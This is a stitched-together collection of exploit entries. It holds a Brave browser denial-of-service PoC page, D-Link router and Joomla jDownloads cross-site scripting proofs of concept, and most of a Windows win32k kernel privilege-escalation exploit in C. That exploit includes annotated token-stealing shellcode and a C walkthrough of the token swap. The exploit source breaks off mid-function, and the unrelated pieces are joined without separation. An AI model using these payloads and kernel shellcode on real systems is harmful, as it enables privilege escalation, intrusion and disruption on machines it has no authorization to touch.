AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
</script>
</html>
# Exploit Title: Brave Browser < 0.13.0 Denial of Service (resource consumption) via window.close(self)
# Date: 2017-10-16
# Exploit Author: Sahil Tikoo
# Vendor Homepage: https://brave.com
# Software Link: https://github.com/brave/browser-laptop
# Version: 0.12.5
# Tested on: Kali Linux, Ubuntu, Windows
# CVE : CVE-2016-10718
<html>
<head>
<title>Brave Window Object Remote Denial of Service.</title>
</head>
<body><br><br>
<h1><center>Brave Window Object Remote Denial of Service</center></h1><br><br>
<h2><center>Proof of Concept</center></h2><br><br>
<center>
<b>Click the link below to trigger the vulnerability.</b><br><br>
<hr>
<hr>
<b><a href="javascript:window.close(self);">Brave Window Object DoS Test POC</a></b>
</center>
</body>
</html>
######################################################################################
# Exploit Title: D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting (XSS)
# Date: 14.04.2018
# Exploit Author: Sayan Chatterjee
# Vendor Homepage: http://www.dlink.co.in
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Category: Hardware (Wi-fi Router)
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10
# CVE: CVE-2018-10110
#######################################################################################
Reproduction Steps:
------------------------------
1. Browse to the router's admin interface (e.g. http://192.168.0.1).
2. Go to "Maintenance" -> "Admin".
3. Create a user with the name alert_"HI"
4. Refresh the page: a "HI" popup appears, because the stored user name is written back into the page without output encoding.
#######################################################################################
#######################################
# Exploit Title: Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
# Google Dork: N/A
# Date: 14-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.jdownloads.com/
# Software Link: http://www.jdownloads.com/index.php/downloads/category/6-jdownloads.html
# Affected Version: 3.2.58
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : CVE-2018-10068
#
# 1. Vendor Description:
#
# Exclusive Download manager for Joomla!
#
# 2. Technical Description:
#
# Cross-site scripting (XSS) vulnerability in the plupload Flash component (Moxie.swf) shipped with jDownloads before 3.2.59 allows remote attackers to inject arbitrary web script via the target and uid parameters, as in the PoC URL below.
#
# 3. Proof Of Concept:
#
http://url/joomla/administrator/components/com_jdownloads/assets/plupload/js/Moxie.swf?target%g=alert&uid%g=nice
#
# 4. Solution:
#
# Upgrade to jDownloads 3.2.59 or later.
# https://extensions.joomla.org/extension/jdownloads/
#
# 5. Reference:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10068
# https://vel.joomla.org/resolved/2150-jdownloads-3-2-58-xss-cross-site-scripting
#####################################
#include <Windows.h>
#include <wingdi.h>
#include <iostream>
#include <Psapi.h>
#pragma comment(lib, "psapi.lib")
#define POCDEBUG 0
#if POCDEBUG == 1
#define POCDEBUG_BREAK() getchar()
#elif POCDEBUG == 2
#define POCDEBUG_BREAK() DebugBreak()
#else
#define POCDEBUG_BREAK()
#endif
static PVOID(__fastcall *pfnHMValidateHandle)(HANDLE, BYTE) = NULL;
static constexpr UINT num_PopupMenuCount = 2;
static constexpr UINT num_WndShadowCount = 3;
static constexpr UINT num_NtUserMNDragLeave = 0x11EC; // win32k system service number; build-specific
static constexpr UINT num_offset_WND_pcls = 0x64; // offset of tagWND.pcls; build-specific
static HMENU hpopupMenu[num_PopupMenuCount] = { 0 };
static UINT iMenuCreated = 0;
static BOOL bDoneExploit = FALSE;
static DWORD popupMenuRoot = 0;
static HWND hWindowMain = NULL;
static HWND hWindowHunt = NULL;
static HWND hWindowList[0x100] = { 0 };
static UINT iWindowCount = 0;
static PVOID pvHeadFake = NULL;
static PVOID pvAddrFlags = NULL;
typedef struct _HEAD {
HANDLE h;
DWORD cLockObj;
} HEAD, *PHEAD;
typedef struct _THROBJHEAD {
HEAD head;
PVOID pti;
} THROBJHEAD, *PTHROBJHEAD;
typedef struct _DESKHEAD {
PVOID rpdesk;
PBYTE pSelf;
} DESKHEAD, *PDESKHEAD;
typedef struct _THRDESKHEAD {
THROBJHEAD thread;
DESKHEAD deskhead;
} THRDESKHEAD, *PTHRDESKHEAD;
typedef struct _SHELLCODE {
DWORD reserved;
DWORD pid;
DWORD off_CLS_lpszMenuName;
DWORD off_THREADINFO_ppi;
DWORD off_EPROCESS_ActiveLink;
DWORD off_EPROCESS_Token;
PVOID tagCLS[0x100];
BYTE pfnWindProc[];
} SHELLCODE, *PSHELLCODE;
static PSHELLCODE pvShellCode = NULL;
// Arguments:
// [ebp+08h]:pwnd = pwndWindowHunt;
// [ebp+0Ch]:msg = 0x9F9F;
// [ebp+10h]:wParam = popupMenuRoot;
// [ebp+14h]:lParam = NULL;
// In kernel-mode, the first argument is tagWND pwnd.
static
BYTE
xxPayloadWindProc[] = {
// Loader+0x108a:
// Bail out unless `msg` is the magic value 0x9F9F.
0x55, // push ebp
0x8b, 0xec, // mov ebp,esp
0x8b, 0x45, 0x0c, // mov eax,dword ptr [ebp+0Ch]
0x3d, 0x9f, 0x9f, 0x00, 0x00, // cmp eax,9F9Fh
0x0f, 0x85, 0x8d, 0x00, 0x00, 0x00, // jne Loader+0x1128
// Loader+0x109b:
// Bail out if CS == 0x1B (the user-mode code selector): the payload must only act when called from kernel mode.
0x66, 0x8c, 0xc8, // mov ax,cs
0x66, 0x83, 0xf8, 0x1b, // cmp ax,1Bh
0x0f, 0x84, 0x80, 0x00, 0x00, 0x00, // je Loader+0x1128
// Loader+0x10a8:
// Get the address of pwndWindowHunt to ECX.
// Recover the flags of pwndWindowHunt: zero bServerSideWindowProc.
// Get the address of pvShellCode to EDX by CALL-POP.
// Get the address of pvShellCode->tagCLS[0x100] to ESI.
// Get the address of popupMenuRoot to EDI.
0xfc, // cld
0x8b, 0x4d, 0x08, // mov ecx,dword ptr [ebp+8]
0xff, 0x41, 0x16, // inc dword ptr [ecx+16h]
0x60, // pushad
0xe8, 0x00, 0x00, 0x00, 0x00, // call $5
0x5a, // pop edx
0x81, 0xea, 0x43, 0x04, 0x00, 0x00, // sub edx,443h
0xbb, 0x00, 0x01, 0x00, 0x00, // mov ebx,100h
0x8d, 0x72, 0x18, // lea esi,[edx+18h]
0x8b, 0x7d, 0x10, // mov edi,dword ptr [ebp+10h]
// Loader+0x10c7:
0x85, 0xdb, // test ebx,ebx
0x74, 0x13, // je Loader+0x10de
// Loader+0x10cb:
// Skip empty slots (pvShellCode->tagCLS[ebx] == NULL).
0xad, // lods dword ptr [esi]
0x4b, // dec ebx
0x83, 0xf8, 0x00, // cmp eax,0
0x74, 0xf5, // je Loader+0x10c7
// Loader+0x10d2:
// Only patch classes whose lpszMenuName still points at popupMenuRoot.
0x03, 0x42, 0x08, // add eax,dword ptr [edx+8]
0x39, 0x38, // cmp dword ptr [eax],edi
0x75, 0xee, // jne Loader+0x10c7
// Loader+0x10d9:
// Zero tagCLS->lpszMenuName
0x83, 0x20, 0x00, // and dword ptr [eax],0
0xeb, 0xe9, // jmp Loader+0x10c7
// Loader+0x10de:
// Load pwndWindowHunt->head.pti->ppi->Process (our EPROCESS) into ECX,
// the ActiveProcessLinks offset into EBX and pvShellCode->pid into EAX.
0x8b, 0x49, 0x08, // mov ecx,dword ptr [ecx+8]
0x8b, 0x5a, 0x0c, // mov ebx,dword ptr [edx+0Ch]
0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx]
0x8b, 0x09, // mov ecx,dword ptr [ecx]
0x8b, 0x5a, 0x10, // mov ebx,dword ptr [edx+10h]
0x8b, 0x42, 0x04, // mov eax,dword ptr [edx+4]
0x51, // push ecx
// Loader+0x10f0:
// Is this our EPROCESS? UniqueProcessId sits 4 bytes before ActiveProcessLinks.
0x39, 0x44, 0x0b, 0xfc, // cmp dword ptr [ebx+ecx-4],eax
0x74, 0x07, // je Loader+0x10fd
// Loader+0x10f6:
// Advance to the next EPROCESS via ActiveProcessLinks (Flink minus the link offset).
0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx]
0x2b, 0xcb, // sub ecx,ebx
0xeb, 0xf3, // jmp Loader+0x10f0
// Loader+0x10fd:
// Save our EPROCESS in EDI and restore the starting EPROCESS to ECX.
0x8b, 0xf9, // mov edi,ecx
0x59, // pop ecx
// Loader+0x1100:
// Is this the System process (UniqueProcessId == 4)?
0x83, 0x7c, 0x0b, 0xfc, 0x04, // cmp dword ptr [ebx+ecx-4],4
0x74, 0x07, // je Loader+0x110e
// Loader+0x1107:
// Advance to the next EPROCESS via ActiveProcessLinks (Flink minus the link offset).
0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx]
0x2b, 0xcb, // sub ecx,ebx
0xeb, 0xf2, // jmp Loader+0x1100
// Loader+0x110e:
// ESI = System EPROCESS. Copy System's Token (an EX_FAST_REF) over our own
// with lods/stos; its low three bits are cached references, so mask them off
// (and eax,0FFFFFFF8h) to reach the token object and add 2 to the
// OBJECT_HEADER.PointerCount that sits 0x18 bytes before the body, so the
// shared token is never freed from under us. Return 0x9F9F to the caller.
0x8b, 0xf1, // mov esi,ecx
0x8b, 0x42, 0x14, // mov eax,dword ptr [edx+14h]
0x03, 0xf0, // add esi,eax
0x03, 0xf8, // add edi,eax
0xad, // lods dword ptr [esi]
0xab, // stos dword ptr es:[edi]
0x83, 0xe0, 0xf8, // and eax,0FFFFFFF8h
0x83, 0x40, 0xe8, 0x02, // add dword ptr [eax-18h],2
0x61, // popad
0xb8, 0x9f, 0x9f, 0x00, 0x00, // mov eax,9F9Fh
0xeb, 0x05, // jmp Loader+0x112d
// Loader+0x1128:
// Failure path: return 1 so the caller can tell the token swap did not happen.
0xb8, 0x01, 0x00, 0x00, 0x00, // mov eax,1
// Loader+0x112d:
0xc9, // leave
0xc2, 0x10, 0x00, // ret 10h
};
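The second half of xxPayloadWindProc, from Loader+0x10de on, is a standard token-stealing routine, and its pointer arithmetic is easier to follow in C than in raw bytes. The block below is an added example, not part of the original PoC: it re-implements that walk over a constructed in-memory process list so it runs on any host. Everything with a _SIM suffix, the padding sizes, the pids 4/512/1234 and the privilege words are assumptions standing in for the real kernel structures; the x86 EX_FAST_REF mask (low three bits) and the header-before-body relationship mirror what the shellcode's `and eax,0FFFFFFF8h` and `[eax-18h]` assume. It also adds the one-lap cycle guard the shellcode lacks, which is the failure mode to worry about: a walk for a pid that is not on the list never terminates in ring 0.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-ins for the kernel objects the payload walks. Layouts are
 * hypothetical; only the relationships the shellcode relies on are kept:
 * UniqueProcessId sits directly before ActiveProcessLinks ("[ebx+ecx-4]"),
 * Token is an EX_FAST_REF whose low three bits are cached references
 * ("and eax,0FFFFFFF8h"), and the OBJECT_HEADER lies immediately before the
 * token body ("[eax-18h]"). */
typedef struct list_entry_sim { struct list_entry_sim *Flink, *Blink; } LIST_ENTRY_SIM;
typedef struct {
    uint8_t        pad[0x20];          /* unrelated EPROCESS fields */
    uintptr_t      UniqueProcessId;
    LIST_ENTRY_SIM ActiveProcessLinks;
    uintptr_t      Token;              /* EX_FAST_REF: body pointer | refs */
} EPROCESS_SIM;
typedef struct { intptr_t PointerCount; intptr_t HandleCount; uint8_t rest[0x10]; } OBJECT_HEADER_SIM;
typedef struct {
    OBJECT_HEADER_SIM hdr;             /* header sits right before the body */
    uint32_t          privileges;      /* stand-in for the token's contents */
} TOKEN_OBJECT_SIM;
#define EX_FAST_REF_MASK ((uintptr_t)7)

static _Alignas(16) TOKEN_OBJECT_SIM g_system_token = { { 1, 1, { 0 } }, 0xFFFFFFFFu };
static _Alignas(16) TOKEN_OBJECT_SIM g_user_token   = { { 1, 1, { 0 } }, 0x00000001u };
static EPROCESS_SIM g_procs[3];

/* What a real EPROCESS.Token points at: the body just past the header. */
static uintptr_t token_body(TOKEN_OBJECT_SIM *t) {
    return (uintptr_t)((uint8_t *)t + sizeof(OBJECT_HEADER_SIM));
}
/* Strip the fast-ref bits, then step back over the object header. */
static OBJECT_HEADER_SIM *token_header(uintptr_t fast_ref) {
    uint8_t *body = (uint8_t *)(fast_ref & ~EX_FAST_REF_MASK);
    return (OBJECT_HEADER_SIM *)(body - sizeof(OBJECT_HEADER_SIM));
}
uint32_t token_privileges(uintptr_t fast_ref) {
    return ((TOKEN_OBJECT_SIM *)token_header(fast_ref))->privileges;
}
/* CONTAINING_RECORD: the shellcode's "mov ecx,[ebx+ecx]; sub ecx,ebx". */
static EPROCESS_SIM *from_links(LIST_ENTRY_SIM *e) {
    return (EPROCESS_SIM *)((uint8_t *)e - offsetof(EPROCESS_SIM, ActiveProcessLinks));
}

/* Walk ActiveProcessLinks until UniqueProcessId == pid. Unlike the assembly,
 * stop after one full lap so a missing pid yields NULL, not an endless loop. */
EPROCESS_SIM *find_process(EPROCESS_SIM *start, uintptr_t pid) {
    EPROCESS_SIM *p = start;
    do {
        if (p->UniqueProcessId == pid)
            return p;
        p = from_links(p->ActiveProcessLinks.Flink);
    } while (p != start);
    return NULL;
}

/* The swap itself: copy System's EX_FAST_REF over ours (lods/stos) and take two
 * extra references on the token object, as the payload does. 1 on success. */
int steal_token(EPROCESS_SIM *start, uintptr_t my_pid, uintptr_t system_pid) {
    EPROCESS_SIM *me  = find_process(start, my_pid);
    EPROCESS_SIM *sys = find_process(start, system_pid);
    if (!me || !sys)
        return 0;
    me->Token = sys->Token;
    token_header(sys->Token)->PointerCount += 2;
    return 1;
}

/* Link n entries into a circular ActiveProcessLinks list. */
void build_process_list(EPROCESS_SIM *procs, size_t n,
                        const uintptr_t *pids, const uintptr_t *tokens) {
    for (size_t i = 0; i < n; i++) {
        procs[i].UniqueProcessId = pids[i];
        procs[i].Token = tokens[i];
        procs[i].ActiveProcessLinks.Flink = &procs[(i + 1) % n].ActiveProcessLinks;
        procs[i].ActiveProcessLinks.Blink = &procs[(i + n - 1) % n].ActiveProcessLinks;
    }
}

/* Build the constructed list {System=4, 512, my_pid}, start the walk from our own
 * entry as the payload does, and return the privilege word we end up holding
 * (0 if lookup_pid is not on the list). */
uint32_t demo_steal(uintptr_t my_pid, uintptr_t lookup_pid) {
    uintptr_t pids[3]   = { 4, 512, my_pid };
    uintptr_t tokens[3] = { token_body(&g_system_token) | 3,   /* 3 cached refs */
                            token_body(&g_user_token) | 1,
                            token_body(&g_user_token) | 1 };
    g_system_token.hdr.PointerCount = 1;
    build_process_list(g_procs, 3, pids, tokens);
    if (!steal_token(&g_procs[2], lookup_pid, 4))
        return 0;
    return token_privileges(g_procs[2].Token);
}
intptr_t system_token_pointer_count(void) { return g_system_token.hdr.PointerCount; }

int main(void) {
    printf("privileges after steal: 0x%08x\n", (unsigned)demo_steal(1234, 1234));
    printf("System token PointerCount: %ld\n", (long)system_token_pointer_count());
    return 0;
}
```

With any C11 compiler, `demo_steal(1234, 1234)` returns 0xFFFFFFFF (our entry now holds the System token) and the System token's PointerCount goes from 1 to 3, while `demo_steal(1234, 9999)` returns 0 instead of hanging. In the real payload the equivalent offsets are read from pvShellCode (off_EPROCESS_ActiveLink, off_EPROCESS_Token) so the same logic ports across kernel builds; here they are fixed by the struct definitions.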
// HMValidateHandle is not exported by user32.dll, but IsMenu calls it right
// after loading the object type into DL ("mov dl, 2" = bytes B2 02, read here
// as the little-endian WORD 0x02B2). Scan the first 0x30 bytes of IsMenu for
// that pattern followed by a near CALL (E8 rel32) and resolve the call target:
// target = address_of_call + 5 + rel32.
static
VOID
xxGetHMValidateHandle(VOID)
{
HMODULE hModule = LoadLibraryA("USER32.DLL");
PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
PBYTE Address = NULL;
for (INT i = 0; i < 0x30; i++)
{
if (*(WORD *)(i + pfnIsMenu) != 0x02B2) // mov dl, 2 (TYPE_MENU)
{
continue;
}
i += 2;
if (*(BYTE *)(i + pfnIsMenu) != 0xE8) // call rel32
{
continue;
}
// rel32 is relative to the end of the 5-byte CALL instruction.
Address = *(DWORD *)(i + pfnIsMenu + 1) + pfnIsMenu;
Address = Address + i + 5;
pfnHMValidateHandle = (PVOID(__fastcall *)(HANDLE, BYTE))Address;
break;
}
}
#define TYPE_WINDOW 1
static
PVOID
xxHMValidateHandleEx(HWND hwnd)
{
return pfnHMValidateHandle((HANDLE)hwnd, TYPE_WINDOW);
}
static
PVOID
xxHMValidateHandle(HWND hwnd)
{
PVOID RetAddr = NULL;
if (!pfnHMValidateHandle)
{
xxGetHMValidateHandle();
}
if (pfnHMValidateHandle)
{
RetAddr = xxHMValidateHandleEx(hwnd);
}
return RetAddr;
}
static
ULONG_PTR
xxSyscall(UINT num, ULONG_PTR param1, ULONG_PTR param2)
{
__asm { mov eax, num };
__asm { int 2eh };
}
static
LRESULT
WINAPI
xxShadowWindowProc(
_In_ HWND hwnd,
_In_ UINT msg,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
if (msg != WM_NCDESTROY || bDoneExploit)
{
return DefWindowProcW(hwnd, msg, wParam, lParam);
}
std::cout << "::" << __FUNCTION__ << std::endl;
POCDEBUG_BREAK();
DWORD dwPopupFake[0xD] = { 0 };
